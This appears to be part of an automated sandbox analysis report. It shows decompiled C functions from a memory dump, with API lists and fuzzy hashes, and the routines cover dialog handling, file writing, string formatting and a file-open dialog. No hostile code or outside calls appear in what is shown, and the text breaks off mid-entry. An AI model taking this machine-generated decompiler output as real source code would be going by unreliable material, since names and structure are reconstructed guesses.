                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                      				long _v8;
                                                                                      				long _v12;
                                                                                      				long _t13;
                                                                                      				void* _t14;
                                                                                      				struct HWND__* _t24;
                                                                                      
                                                                                      				_t24 = GetDlgItem(_a4, _a8);
                                                                                      				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                      				_v12 = _t13;
                                                                                      				_v8 = 0;
                                                                                      				if(_t13 <= 0) {
                                                                                      					L3:
                                                                                      					_t14 = 0;
                                                                                      				} else {
                                                                                      					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                      						_v8 = _v8 + 1;
                                                                                      						if(_v8 < _v12) {
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							goto L3;
                                                                                      						}
                                                                                      						goto L4;
                                                                                      					}
                                                                                      					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                      					_t14 = 1;
                                                                                      				}
                                                                                      				L4:
                                                                                      				return _t14;
                                                                                      			}


                                                                                      APIs
                                                                                      • GetDlgItem.USER32 ref: 00404A52
                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item
                                                                                      • String ID:
                                                                                      • API String ID: 3888421826-0
                                                                                      • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                      • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                      • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                      • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 93%
                                                                                      			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                      				long _v8;
                                                                                      				void _v8199;
                                                                                      				char _v8200;
                                                                                      
                                                                                      				E0040B550(0x2004, __ecx);
                                                                                      				_v8200 = 0;
                                                                                      				memset( &_v8199, 0, 0x1fff);
                                                                                      				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                      				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                      			}


                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004072FD
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                      • strlen.MSVCRT ref: 00407328
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2754987064-0
                                                                                      • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                      • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                      • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                      • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                                      				int _t7;
                                                                                      				void** _t11;
                                                                                      
                                                                                      				_t11 = __eax;
                                                                                      				if( *0x4101b4 == 0) {
                                                                                      					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                                      					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                                      					 *0x4101b4 = 1;
                                                                                      					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                                      					 *0x4101b4 =  *0x4101b4 & 0x00000000;
                                                                                      					 *0x40f2f4 = _t7;
                                                                                      					return 1;
                                                                                      				} else {
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}


                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                      • String ID:
                                                                                      • API String ID: 1386444988-0
                                                                                      • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                      • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                      • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                      • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                                      				int _t10;
                                                                                      				int _t12;
                                                                                      				void* _t23;
                                                                                      				wchar_t* _t24;
                                                                                      				signed int _t25;
                                                                                      
                                                                                      				_t24 = __edi;
                                                                                      				_t25 = wcslen(__edi);
                                                                                      				_t10 = wcslen(_a4);
                                                                                      				_t23 = _t10 + _t25;
                                                                                      				if(_t23 >= 0x3ff) {
                                                                                      					_t12 = _t10 - _t23 + 0x3ff;
                                                                                      					if(_t12 > 0) {
                                                                                      						wcsncat(__edi + _t25 * 2, _a4, _t12);
                                                                                      					}
                                                                                      				} else {
                                                                                      					wcscat(__edi + _t25 * 2, _a4);
                                                                                      				}
                                                                                      				return _t24;
                                                                                      			}









                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcslen$wcscatwcsncat
                                                                                      • String ID:
                                                                                      • API String ID: 291873006-0
                                                                                      • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                      • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                      • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                      • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				struct HWND__* _t11;
                                                                                      				struct HWND__* _t14;
                                                                                      				struct HWND__* _t15;
                                                                                      				void* _t16;
                                                                                      
                                                                                      				_t14 = __eax;
                                                                                      				_t16 = __ecx;
                                                                                      				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                      				GetClientRect(__eax, __ecx + 0xa14);
                                                                                      				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
                                                                                      				_t15 = GetWindow(GetWindow(_t14, 5), 0);
                                                                                      				do {
                                                                                      					E00402D99(_t15, _t16);
                                                                                      					_t11 = GetWindow(_t15, 2);
                                                                                      					_t15 = _t11;
                                                                                      				} while (_t15 != 0);
                                                                                      				return _t11;
                                                                                      			}










                                                                                      APIs
                                                                                      • GetClientRect.USER32 ref: 00402DEF
                                                                                      • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                      • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                        • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                        • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$ClientPoints
                                                                                      • String ID:
                                                                                      • API String ID: 4235085887-0
                                                                                      • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                      • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                      • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                      • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 72%
                                                                                      			E0040B6A6() {
                                                                                      				intOrPtr _t1;
                                                                                      				intOrPtr _t2;
                                                                                      				intOrPtr _t3;
                                                                                      				intOrPtr _t4;
                                                                                      
                                                                                      				_t1 =  *0x41c458;
                                                                                      				if(_t1 != 0) {
                                                                                      					_push(_t1);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t2 =  *0x41c460;
                                                                                      				if(_t2 != 0) {
                                                                                      					_push(_t2);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t3 =  *0x41c45c;
                                                                                      				if(_t3 != 0) {
                                                                                      					_push(_t3);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t4 =  *0x41c464;
                                                                                      				if(_t4 != 0) {
                                                                                      					_push(_t4);
                                                                                      					L0040B272();
                                                                                      					return _t4;
                                                                                      				}
                                                                                      				return _t4;
                                                                                      			}








                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                      • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                      • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                      • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
                                                                                      			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				void* _v16;
                                                                                      				wchar_t* _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				char _v36;
                                                                                      				void* __edi;
                                                                                      				signed int _t39;
                                                                                      				wchar_t* _t41;
                                                                                      				signed int _t45;
                                                                                      				signed int _t48;
                                                                                      				wchar_t* _t53;
                                                                                      				wchar_t* _t62;
                                                                                      				void* _t66;
                                                                                      				intOrPtr* _t68;
                                                                                      				void* _t70;
                                                                                      				wchar_t* _t75;
                                                                                      				wchar_t* _t79;
                                                                                      
                                                                                      				_t66 = __ebx;
                                                                                      				_t75 = 0;
                                                                                      				_v8 = 0;
                                                                                      				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                      					do {
                                                                                      						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
                                                                                      						_t68 = _a8;
                                                                                      						if(_t68 != _t75) {
                                                                                      							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
                                                                                      						} else {
                                                                                      							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
                                                                                      						}
                                                                                      						_t41 = wcschr(_t79, 0x2c);
                                                                                      						_pop(_t70);
                                                                                      						if(_t41 != 0) {
                                                                                      							L8:
                                                                                      							_v20 = _t75;
                                                                                      							_v28 = _t75;
                                                                                      							_v36 = _t75;
                                                                                      							_v24 = 0x100;
                                                                                      							_v32 = 1;
                                                                                      							_v16 = 0x22;
                                                                                      							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                      							while(1) {
                                                                                      								_t45 =  *_t79 & 0x0000ffff;
                                                                                      								__eflags = _t45;
                                                                                      								_v12 = _t45;
                                                                                      								_t77 =  &_v36;
                                                                                      								if(__eflags == 0) {
                                                                                      									break;
                                                                                      								}
                                                                                      								__eflags = _t45 - 0x22;
                                                                                      								if(__eflags != 0) {
                                                                                      									_push( &_v12);
                                                                                      									_t48 = 1;
                                                                                      									__eflags = 1;
                                                                                      								} else {
                                                                                      									_push(L"\"\"");
                                                                                      									_t48 = _t45 | 0xffffffff;
                                                                                      								}
                                                                                      								E0040565D(_t48, _t70, _t77, __eflags);
                                                                                      								_t79 =  &(_t79[0]);
                                                                                      								__eflags = _t79;
                                                                                      							}
                                                                                      							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                      							_t53 = _v20;
                                                                                      							__eflags = _t53;
                                                                                      							if(_t53 == 0) {
                                                                                      								_t53 = 0x40c4e8;
                                                                                      							}
                                                                                      							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
                                                                                      							_t75 = 0;
                                                                                      							__eflags = 0;
                                                                                      						} else {
                                                                                      							_t62 = wcschr(_t79, 0x22);
                                                                                      							_pop(_t70);
                                                                                      							if(_t62 != 0) {
                                                                                      								goto L8;
                                                                                      							} else {
                                                                                      								E00407343(_t66, _a4, _t79);
                                                                                      							}
                                                                                      						}
                                                                                      						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                                      							E00407343(_t66, _a4, ",");
                                                                                      						}
                                                                                      						_v8 = _v8 + 1;
                                                                                      					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                                      				}
                                                                                      				return E00407343(_t66, _a4, L"\r\n");
                                                                                      			}























                                                                                      0x00407419
                                                                                      0x0040742f
                                                                                      0x00407434
                                                                                      0x00407437
                                                                                      0x00407439
                                                                                      0x0040743b
                                                                                      0x0040743b
                                                                                      0x0040744e
                                                                                      0x00407453
                                                                                      0x00407453
                                                                                      0x004073af
                                                                                      0x004073b2
                                                                                      0x004073ba
                                                                                      0x004073bb
                                                                                      0x00000000
                                                                                      0x004073bd
                                                                                      0x004073c3
                                                                                      0x004073c3
                                                                                      0x004073bb
                                                                                      0x0040745c
                                                                                      0x00407468
                                                                                      0x00407468
                                                                                      0x0040746d
                                                                                      0x00407473
                                                                                      0x0040747c
                                                                                      0x0040748e

                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 004073A4
                                                                                      • wcschr.MSVCRT ref: 004073B2
                                                                                        • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                        • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcschr$memcpywcslen
                                                                                      • String ID: "
                                                                                      • API String ID: 1983396471-123907689
                                                                                      • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                      • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                      • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                      • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 45%
                                                                                      			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                                      				char _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				char _v80;
                                                                                      				signed short _v65616;
                                                                                      				void* _t27;
                                                                                      				intOrPtr _t28;
                                                                                      				void* _t34;
                                                                                      				intOrPtr _t39;
                                                                                      				intOrPtr* _t51;
                                                                                      				void* _t52;
                                                                                      
                                                                                      				_t51 = __esi;
                                                                                      				E0040B550(0x1004c, __ecx);
                                                                                      				_t39 = 0;
                                                                                      				_push(0);
                                                                                      				_push( &_v8);
                                                                                      				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                      				_push(L"Lines");
                                                                                      				_t27 =  *((intOrPtr*)( *__esi))();
                                                                                      				if(_v8 > 0) {
                                                                                      					do {
                                                                                      						_t6 = _t39 + 1; // 0x1
                                                                                      						_t28 = _t6;
                                                                                      						_push(_t28);
                                                                                      						_push(L"Line%d");
                                                                                      						_v12 = _t28;
                                                                                      						_push(0x1f);
                                                                                      						_push( &_v80);
                                                                                      						L0040B1EC();
                                                                                      						_t52 = _t52 + 0x10;
                                                                                      						_push(0x7fff);
                                                                                      						_push(0x40c4e8);
                                                                                      						if( *((intOrPtr*)(_t51 + 4)) == 0) {
                                                                                      							_v65616 = _v65616 & 0x00000000;
                                                                                      							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
                                                                                      							_t34 = E004054DF(_a4, _t51,  &_v65616);
                                                                                      						} else {
                                                                                      							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
                                                                                      						}
                                                                                      						_t39 = _v12;
                                                                                      					} while (_t39 < _v8);
                                                                                      					return _t34;
                                                                                      				}
                                                                                      				return _t27;
                                                                                      			}














                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintf
                                                                                      • String ID: Line%d$Lines
                                                                                      • API String ID: 3988819677-2790224864
                                                                                      • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                      • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                      • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                      • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 70%
                                                                                      			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                      				void* _v8;
                                                                                      				void* _v26;
                                                                                      				void _v28;
                                                                                      				void* _t24;
                                                                                      				void* _t25;
                                                                                      				void* _t35;
                                                                                      				signed int _t38;
                                                                                      				signed int _t42;
                                                                                      				void* _t44;
                                                                                      				void* _t45;
                                                                                      
                                                                                      				_t24 = _a12;
                                                                                      				_t45 = _t44 - 0x18;
                                                                                      				_t42 = 0;
                                                                                      				 *_t24 = 0;
                                                                                      				if(_a8 <= 0) {
                                                                                      					_t25 = 0;
                                                                                      				} else {
                                                                                      					_t38 = 0;
                                                                                      					_t35 = 0;
                                                                                      					if(_a8 > 0) {
                                                                                      						_v8 = _t24;
                                                                                      						while(1) {
                                                                                      							_v28 = _v28 & 0x00000000;
                                                                                      							asm("stosd");
                                                                                      							asm("stosd");
                                                                                      							asm("stosd");
                                                                                      							asm("stosd");
                                                                                      							asm("stosw");
                                                                                      							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                      							_push(L"%2.2X ");
                                                                                      							_push(0xa);
                                                                                      							_push( &_v28);
                                                                                      							L0040B1EC();
                                                                                      							_t38 = _t42;
                                                                                      							memcpy(_v8,  &_v28, 6);
                                                                                      							_t13 = _t42 + 3; // 0x3
                                                                                      							_t45 = _t45 + 0x1c;
                                                                                      							if(_t13 >= 0x2000) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_v8 = _v8 + 6;
                                                                                      							_t35 = _t35 + 1;
                                                                                      							_t42 = _t42 + 3;
                                                                                      							if(_t35 < _a8) {
                                                                                      								continue;
                                                                                      							}
                                                                                      							break;
                                                                                      						}
                                                                                      						_t24 = _a12;
                                                                                      					}
                                                                                      					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                      					_t25 = 1;
                                                                                      				}
                                                                                      				return _t25;
                                                                                      			}














                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintfmemcpy
                                                                                      • String ID: %2.2X
                                                                                      • API String ID: 2789212964-323797159
                                                                                      • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                      • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                      • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                      • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 43%
                                                                                      			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                      				char _v44;
                                                                                      				intOrPtr _t22;
                                                                                      				signed int _t30;
                                                                                      				signed int _t34;
                                                                                      				void* _t35;
                                                                                      				void* _t36;
                                                                                      
                                                                                      				_t35 = __esi;
                                                                                      				_t34 = 0;
                                                                                      				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                                      					do {
                                                                                      						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                                      						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                                      						L0040B1EC();
                                                                                      						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                                      						_push( &_v44);
                                                                                      						_push(0x2000);
                                                                                      						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                                      						L0040B1EC();
                                                                                      						_t36 = _t36 + 0x24;
                                                                                      						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
                                                                                      						_t34 = _t34 + 1;
                                                                                      					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                                      				}
                                                                                      				return E00407343(_t35, _a4, L"\r\n");
                                                                                      			}










                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintf
                                                                                      • String ID: %%-%d.%ds
                                                                                      • API String ID: 3988819677-2008345750
                                                                                      • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                      • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                      • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                      • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                      				intOrPtr _v20;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				intOrPtr _v44;
                                                                                      				intOrPtr _v48;
                                                                                      				wchar_t* _v52;
                                                                                      				intOrPtr _v56;
                                                                                      				intOrPtr _v64;
                                                                                      				intOrPtr _v68;
                                                                                      				intOrPtr _v76;
                                                                                      				struct tagOFNA _v80;
                                                                                      
                                                                                      				_v76 = __eax;
                                                                                      				_v68 = _a4;
                                                                                      				_v64 = 0;
                                                                                      				_v44 = 0;
                                                                                      				_v36 = 0;
                                                                                      				_v32 = _a8;
                                                                                      				_v20 = _a12;
                                                                                      				_v80 = 0x4c;
                                                                                      				_v56 = 1;
                                                                                      				_v52 = __esi;
                                                                                      				_v48 = 0x104;
                                                                                      				_v28 = 0x81804;
                                                                                      				if(GetOpenFileNameW( &_v80) == 0) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					wcscpy(__esi, _v52);
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}
















                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
